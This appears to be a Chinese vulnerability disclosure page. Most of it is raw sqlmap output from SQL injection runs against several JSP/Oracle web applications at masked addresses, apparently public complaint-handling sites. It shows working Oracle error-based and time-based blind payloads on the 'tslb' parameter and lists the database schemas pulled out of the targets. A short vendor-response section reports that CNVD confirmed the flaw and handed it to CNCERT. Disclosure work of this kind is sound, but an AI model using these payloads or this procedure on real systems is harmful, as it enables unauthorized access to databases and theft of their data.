[06:40:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:40:13] [INFO] testing 'MySQL & 5.0.11 AND time-based blind'
[06:40:36] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:40:36] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. --flush-session --tech
nique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[06:40:38] [INFO] testing 'PostgreSQL & 8.1 AND time-based blind'
[06:40:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:40:43] [INFO] testing 'Oracle AND time-based blind'
[06:40:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[06:41:20] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:41:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:41:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:41:54] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
[06:42:16] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:42:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:43:10] [WARNING] GET parameter 'act' is not injectable
[06:43:10] [INFO] testing if GET parameter 'tslb' is dynamic
[06:43:11] [WARNING] GET parameter 'tslb' appears to be not dynamic
[06:43:12] [WARNING] heuristic test shows that GET parameter 'tslb' might not be
injectable
[06:43:12] [INFO] testing sql injection on GET parameter 'tslb'
[06:43:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:43:25] [INFO] testing 'MySQL &= 5.0 AND error-based - WHERE or HAVING clause
[06:43:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:43:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[06:43:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:43:48] [INFO] GET parameter 'tslb' is 'Oracle AND error-based - WHERE or HAV
ING clause (XMLType)' injectable
[06:43:48] [INFO] testing 'Oracle AND time-based blind'
[06:43:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:43:57] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[06:44:00] [INFO] target url appears to have 8 columns in query
[06:44:27] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
GET parameter 'tslb' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 194 HTTP(s) req
Place: GET
Parameter: tslb
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: act=query&tslb=1' AND 8721=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||
CHR(102)||CHR(104)||CHR(118)||CHR(58)||(SELECT (CASE WHEN () THEN 1 ELS
E 0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(103)||CHR(101)||CHR(58)||CHR(62))) F
ROM DUAL) AND 'VlAn'='VlAn
[06:44:29] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[06:44:29] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[06:44:29] [INFO] fetching database (schema) names
[06:44:30] [INFO] the SQL query used returns 25 entries
[06:44:32] [INFO] retrieved: CTXSYS
[06:44:32] [INFO] retrieved: FYWSXF
[06:44:33] [INFO] retrieved: HR
[06:44:34] [INFO] retrieved: MDSYS
[06:44:40] [INFO] retrieved: ODM
[06:44:42] [INFO] retrieved: ODM_MTR
[06:45:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:45:05] [INFO] retrieved: OE
[06:45:06] [INFO] retrieved: OLAPSYS
[06:45:07] [INFO] retrieved: ORDSYS
[06:45:28] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:45:30] [INFO] retrieved: OUTLN
[06:45:30] [INFO] retrieved: PM
[06:45:36] [INFO] retrieved: QS
[06:45:37] [INFO] retrieved: QS_CBADM
[06:45:38] [INFO] retrieved: QS_CS
[06:45:39] [INFO] retrieved: QS_ES
[06:45:40] [INFO] retrieved: QS_OS
[06:45:41] [INFO] retrieved: QS_WS
[06:45:42] [INFO] retrieved: RMAN
[06:46:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:46:05] [INFO] retrieved: SCOTT
[06:46:06] [INFO] retrieved: SH
[06:46:07] [INFO] retrieved: SYS
[06:46:08] [INFO] retrieved: SYSTEM
[06:46:09] [INFO] retrieved: WKSYS
[06:46:10] [INFO] retrieved: WMSYS
[06:46:11] [INFO] retrieved: XDB
available databases [25]:
[*] CTXSYS
[*] FYWSXF
[*] ODM_MTR
[*] OLAPSYS
[*] ORDSYS
[*] QS_CBADM
[*] SYSTEM
[06:46:11] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\**.**.**.**'
[*] shutting down at 06:46:11
code 区域注入地址:http://**.**.**.**/txwsxf/appellate/appellate.jsessionid=B16A7
84ECAC87F5E0CB22?act=querywsxf&tslb=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 06:39:55
[06:39:55] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\**.**.**.**\session' as session file
[06:39:56] [INFO] testing connection to the target url
[06:39:57] [INFO] testing if the url is stable, wait a few seconds
[06:40:00] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[06:40:01] [INFO] testing if GET parameter 'act' is dynamic
[06:40:01] [INFO] confirming that GET parameter 'act' is dynamic
[06:40:01] [INFO] GET parameter 'act' is dynamic
[06:40:02] [WARNING] heuristic test shows that GET parameter 'act' might not be
injectable
[06:40:02] [INFO] testing sql injection on GET parameter 'act'
[06:40:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:40:04] [INFO] testing 'MySQL &= 5.0 AND error-based - WHERE or HAVING clause
[06:40:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:40:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[06:40:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:40:15] [INFO] testing 'MySQL & 5.0.11 stacked queries'
[06:40:16] [INFO] testing 'PostgreSQL & 8.1 stacked queries'
[06:40:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:40:18] [INFO] testing 'MySQL & 5.0.11 AND time-based blind'
[06:40:19] [INFO] testing 'PostgreSQL & 8.1 AND time-based blind'
[06:40:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:40:22] [INFO] testing 'Oracle AND time-based blind'
[06:40:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[06:40:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:41:16] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:41:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:41:20] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
[06:41:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:42:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:42:37] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:42:39] [WARNING] GET parameter 'act' is not injectable
[06:42:39] [INFO] testing if GET parameter 'tslb' is dynamic
[06:42:43] [WARNING] GET parameter 'tslb' appears to be not dynamic
[06:42:43] [INFO] heuristic test shows that GET parameter 'tslb' might be inject
able (possible DBMS: Oracle)
[06:42:43] [INFO] testing sql injection on GET parameter 'tslb'
[06:42:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:43:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:43:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:43:31] [INFO] GET parameter 'tslb' is 'Oracle AND error-based - WHERE or HAV
ING clause (XMLType)' injectable
[06:43:31] [INFO] testing 'Oracle AND time-based blind'
[06:43:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:43:44] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[06:43:48] [INFO] target url appears to have 8 columns in query
[06:43:58] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
GET parameter 'tslb' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 180 HTTP(s) req
Place: GET
Parameter: tslb
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: act=querywsxf&tslb=1' AND 9732=(SELECT UPPER(XMLType(CHR(60)||CHR(5
8)||CHR(121)||CHR(121)||CHR(111)||CHR(58)||(SELECT (CASE WHEN () THEN 1
ELSE 0 END) FROM DUAL)||CHR(58)||CHR(114)||CHR(107)||CHR(115)||CHR(58)||CHR(62)
)) FROM DUAL) AND 'kdnd'='kdnd
[06:44:00] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[06:44:00] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[06:44:00] [INFO] fetching database (schema) names
[06:44:00] [INFO] the SQL query used returns 26 entries
[06:44:01] [INFO] retrieved: CTXSYS
[06:44:01] [INFO] retrieved: HR
[06:44:02] [INFO] retrieved: MDSYS
[06:44:03] [INFO] retrieved: ODM
[06:44:03] [INFO] retrieved: ODM_MTR
[06:44:04] [INFO] retrieved: OE
[06:44:04] [INFO] retrieved: OLAPSYS
[06:44:05] [INFO] retrieved: ORDSYS
[06:44:05] [INFO] retrieved: OUTLN
[06:44:06] [INFO] retrieved: PM
[06:44:07] [INFO] retrieved: QS
[06:44:07] [INFO] retrieved: QS_CBADM
[06:44:08] [INFO] retrieved: QS_CS
[06:44:08] [INFO] retrieved: QS_ES
[06:44:09] [INFO] retrieved: QS_OS
[06:44:10] [INFO] retrieved: QS_WS
[06:44:10] [INFO] retrieved: RMAN
[06:44:11] [INFO] retrieved: SCOTT
[06:44:11] [INFO] retrieved: SH
[06:44:12] [INFO] retrieved: SYS
[06:44:12] [INFO] retrieved: SYSTEM
[06:44:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:44:37] [INFO] retrieved: TXWSXF
[06:44:37] [INFO] retrieved: TXXF
[06:44:38] [INFO] retrieved: WKSYS
[06:44:39] [INFO] retrieved: WMSYS
[06:44:39] [INFO] retrieved: XDB
available databases [26]:
[*] CTXSYS
[*] ODM_MTR
[*] OLAPSYS
[*] ORDSYS
[*] QS_CBADM
[*] SYSTEM
[*] TXWSXF
[06:44:39] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\**.**.**.**'
[*] shutting down at 06:44:39
code 区域注入地址:http://**.**.**.**/jgxfw/appellate/appellate.do?act=queryzmhd&ts
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 06:46:39
[06:46:39] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\**.**.**.**\session' as session file
[06:46:39] [INFO] resuming back-end DBMS 'oracle' from session file
[06:46:39] [INFO] testing connection to the target url
[06:46:40] [INFO] testing if the url is stable, wait a few seconds
[06:46:42] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[06:46:44] [INFO] testing if GET parameter 'act' is dynamic
[06:46:44] [INFO] confirming that GET parameter 'act' is dynamic
[06:46:44] [INFO] GET parameter 'act' is dynamic
[06:46:45] [WARNING] heuristic test shows that GET parameter 'act' might not be
injectable
[06:46:45] [INFO] testing sql injection on GET parameter 'act'
[06:46:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:46:47] [INFO] testing 'MySQL &= 5.0 AND error-based - WHERE or HAVING clause
[06:46:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:46:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[06:46:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:46:53] [INFO] testing 'MySQL & 5.0.11 stacked queries'
[06:46:55] [INFO] testing 'PostgreSQL & 8.1 stacked queries'
[06:46:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:46:58] [INFO] testing 'MySQL & 5.0.11 AND time-based blind'
[06:46:59] [INFO] testing 'PostgreSQL & 8.1 AND time-based blind'
[06:47:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:47:03] [INFO] testing 'Oracle AND time-based blind'
[06:47:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:47:03] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. --flush-session --tech
nique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[06:47:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[06:47:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:47:19] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:47:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:47:38] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:47:45] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:47:51] [WARNING] GET parameter 'act' is not injectable
[06:47:51] [INFO] testing if GET parameter 'tslb' is dynamic
[06:47:52] [WARNING] GET parameter 'tslb' appears to be not dynamic
[06:47:53] [INFO] heuristic test shows that GET parameter 'tslb' might be inject
able (possible DBMS: Oracle)
[06:47:53] [INFO] testing sql injection on GET parameter 'tslb'
[06:47:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:47:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:47:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:48:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:48:08] [INFO] GET parameter 'tslb' is 'Oracle AND error-based - WHERE or HAV
ING clause (XMLType)' injectable
[06:48:08] [INFO] testing 'Oracle AND time-based blind'
[06:48:21] [INFO] GET parameter 'tslb' is 'Oracle AND time-based blind' injectab
[06:48:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:48:22] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[06:48:25] [INFO] target url appears to have 8 columns in query
[06:48:56] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
GET parameter 'tslb' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 182 HTTP(s) req
Place: GET
Parameter: tslb
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: act=queryzmhd&tslb=1' AND 6587=(SELECT UPPER(XMLType(CHR(60)||CHR(5
8)||CHR(104)||CHR(102)||CHR(99)||CHR(58)||(SELECT (CASE WHEN () THEN 1
ELSE 0 END) FROM DUAL)||CHR(58)||CHR(114)||CHR(114)||CHR(113)||CHR(58)||CHR(62))
) FROM DUAL) AND 'RJsw'='RJsw
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: act=queryzmhd&tslb=1' AND 6803=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||
CHR(78)||CHR(87)||CHR(72),5) AND 'PJtd'='PJtd
[06:49:50] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[06:49:50] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[06:49:50] [INFO] fetching database (schema) names
[06:49:50] [INFO] the SQL query used returns 26 entries
[06:49:50] [INFO] resumed: CTXSYS
[06:49:50] [INFO] resumed: HR
[06:49:50] [INFO] resumed: JGXFN
[06:49:50] [INFO] resumed: JGXFW
[06:49:50] [INFO] resumed: MDSYS
[06:49:50] [INFO] resumed: ODM
[06:49:50] [INFO] resumed: ODM_MTR
[06:49:50] [INFO] resumed: OE
[06:49:50] [INFO] resumed: OLAPSYS
[06:49:50] [INFO] resumed: ORDSYS
[06:49:50] [INFO] resumed: OUTLN
[06:49:50] [INFO] resumed: PM
[06:49:50] [INFO] resumed: QS
[06:49:50] [INFO] resumed: QS_CBADM
[06:49:50] [INFO] resumed: QS_CS
[06:49:50] [INFO] resumed: QS_ES
[06:49:50] [INFO] resumed: QS_OS
[06:49:50] [INFO] resumed: QS_WS
[06:49:50] [INFO] resumed: RMAN
[06:49:50] [INFO] resumed: SCOTT
[06:49:50] [INFO] resumed: SH
[06:49:50] [INFO] resumed: SYS
[06:49:50] [INFO] resumed: SYSTEM
[06:49:50] [INFO] resumed: WKSYS
[06:49:50] [INFO] resumed: WMSYS
[06:49:50] [INFO] resumed: XDB
available databases [26]:
[*] CTXSYS
[*] ODM_MTR
[*] OLAPSYS
[*] ORDSYS
[*] QS_CBADM
[*] SYSTEM
[06:49:50] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\**.**.**.**'
[*] shutting down at 06:49:50
漏洞证明:
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:17
确认时间: 08:52
厂商回复:
CNVD确认并复现所述情况,尝试联系软件生产厂商杭州中软安人,对方不提供联系方式,后通报给网站公开邮箱。根据测试用例,已经转由CNCERT下发给浙江分中心,由其后续协调涉及的网站管理单位处置。
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\xf.
登录后才能发表评论,请先

我要回帖

更多关于 mysql union注入 的文章

 

随机推荐